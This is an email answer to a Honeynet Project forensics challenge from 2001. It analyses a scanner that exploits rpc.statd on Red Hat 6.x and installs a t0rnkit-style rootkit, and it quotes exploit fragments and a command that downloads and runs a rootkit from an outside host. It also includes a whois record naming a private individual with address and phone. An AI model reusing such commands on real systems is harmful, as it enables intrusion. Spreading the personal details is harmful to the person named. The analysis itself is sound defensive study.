From brenda@itsx.com Fri Mar 23 10:13:51 2001 Date: Mon, 19 Mar 2001 12:23:42 +0100 From: brenda To: project@honeynet.org Subject: Scan of the Month March 2001 [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Hello, My try to answer this month's , March 2001, challenge. 1. The blackhat gets a rootkit (with lynx), installs it (in /usr/sbin/.mail) and runs a scanner against a large number of networks. e.g he/she scans the 216.210.0.0/16 network with "./luckgo 216 210" . 2. The tool "connects" to port 111 and asks where/if the rpc.statd is running. Then it will exploit the vulnerable rpc.statd, get root, and install the rootkit. Or as the blackhats say, from the luckroot.tar luckgo file, "Program launched in background,it will SCAN,GET ROOT and INSTALL a rOOtKiT for U." 3. From the luckstatdx.c code it works against "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600, 9},{1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9}". It exploits the rpc.statd service which is installed by default on Redhat 6.2, 6.1, 6.0. According to Cert http://www.cert.org/advisories/CA-2000-17.html this is an input validition problem. What ./luckgo does is scan the hosts (1 by 1), from the given network, to see if they have this rpc.statd service running. It asks on which port because this may vary. It eploits them, with the remote root exploit, then it installs the rootkit. Here it installs the rootkit, from luckstatdx.c "// Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);" 4. Is it a worm or something else? There is some discussion possible about if it is a worm or not. So first you have to define what a worm is. In my opinion a worm is something that spreads without the active interaction of a human. (similar to the Morris worm) Since the blackhat does the scanning of the networks by hand I would say it is not a worm. But if you would add the automated scanning capability to the rootkit it would classify as a worm. Since I did not classify it as a worm I would say it is a "highly" automated rootkit but with a similar security impact of a worm. 5. This tool is not original. The exploit differs only in the next lines from the original http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c/ difference: " // Becys was modify herre some cmd. fmax = max(fileno(stdin), sockd) + 1; send(sockd, "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0); // Aici cred ca trebuie un exit. for(;;) { " I found it hard to tell if the rootkit, xzbit.tar.gz, is different from other linux rootkits. I tried to compare the "rootkit" binaries (e.g. ps, netstat, ifconfig) but found differences between previous released rootkits and the xzbit.tar ball. But if you read Cert http://www.cert.org/incident_notes/IN-2000-10.html I would say that this rootkit is a modified version of the "'t0rnkit' rootkit ". Cert states "Since May of 2000, we have observed more than six different versions of a rootkit being called 't0rnkit', or 'tornkit'. " 5. The website mentioned in the exploit was "disabled" during this challenge. But from the whois database I got. whois -h whois.bulkregister.com becys.org ... bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Fax- Technical Contact: Web Site Source, In info@websitesource.com Web Site Source, Inc. 2476 Bolsover, Suite 484 Houston, TX 77005-2518 US Phone- 713-667-2520 Fax- 800-863-6499 Record updated on 2000-09-11 00:00:00. Record created on 2000-09-11. Record expires on 2002-09-11. Database last updated on 2001-03-11 23:45:47 EST. Domain servers in listed order: NS.WEBSITESOURCE.COM 216.147.43.135 NS2.WEBSITESOURCE.COM 216.147.1.116 It seems like a rootkit from Texas and not from Eastern Europe.